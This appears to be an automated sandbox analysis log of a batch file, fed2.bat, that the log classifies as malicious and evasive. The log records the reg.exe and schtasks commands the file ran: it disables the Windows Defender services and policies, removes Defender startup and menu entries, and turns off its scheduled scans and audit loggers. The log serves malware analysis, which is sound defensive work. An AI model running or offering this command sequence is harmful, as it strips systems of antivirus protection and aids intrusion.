Process created: C:\Windows\System32\reg.
Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Process created: C:\Windows\System32\reg.exe reg add 'HKLM\System\CurrentControlSet\Services\SecurityHealthService' /v 'Start' /t REG_DWORD /d '4' /f
Process created: C:\Windows\System32\reg.exe reg add 'HKLM\System\CurrentControlSet\Services\WinDefend' /v 'Start' /t REG_DWORD /d '4' /f
system HKeyLocalMachineSYSTEMCurrentControlSetControlWMIAutologgerCircular.
Process created: C:\Windows\System32\reg.exe reg add 'HKLM\System\CurrentControlSet\Services\WdNisSvc' /v 'Start' /t REG_DWORD /d '4' /f
Log Name: Microsoft-Windows-Kernel-EventTracing/Admin Source: Jul 29.
Process created: C:\Windows\System32\reg.exe reg add 'HKLM\System\CurrentControlSet\Services\WdNisDrv' /v 'Start' /t REG_DWORD /d '4' /f
Process created: C:\Windows\System32\reg.exe reg add 'HKLM\System\CurrentControlSet\Services\WdFilter' /v 'Start' /t REG_DWORD /d '4' /f
Process created: C:\Windows\System32\reg.exe reg add 'HKLM\System\CurrentControlSet\Services\WdBoot' /v 'Start' /t REG_DWORD /d '4' /f
Process created: C:\Windows\System32\reg.exe reg delete 'HKCR\Drive\shellex\ContextMenuHandlers\EPP' /f
Process created: C:\Windows\System32\reg.exe reg delete 'HKCR\Directory\shellex\ContextMenuHandlers\EPP' /f
Process created: C:\Windows\System32\reg.exe reg delete 'HKCR\*\shellex\ContextMenuHandlers\EPP' /f
Process created: C:\Windows\System32\reg.exe reg delete 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run' /v 'WindowsDefender' /f
Process created: C:\Windows\System32\reg.exe reg delete 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /v 'Windows Defender' /f
Process created: C:\Windows\System32\reg.exe reg delete 'HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run' /v 'Windows Defender' /f
Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN 'Microsoft\Windows\Windows Defender\Windows Defender Verification' /Disable
Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN 'Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan' /Disable
Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN 'Microsoft\Windows\Windows Defender\Windows Defender Cleanup' /Disable
Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN 'Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance' /Disable
Process created: C:\Windows\System32\schtasks.exe schtasks /Change /TN 'Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh' /Disable
Process created: C:\Windows\System32\reg.exe reg add 'HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger' /v 'Start' /t REG_DWORD /d '0' /f
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Desktop\fed2.bat' '
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_01
Source: C:\Windows\System32\conhost.exe
Process created: C:\Windows\System32\reg.exe reg add 'HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger' /v 'Start' /t REG_DWORD /d '0' /f
Classification label: mal52.evad mutexes
Uses reg.exe to modify the Windows registry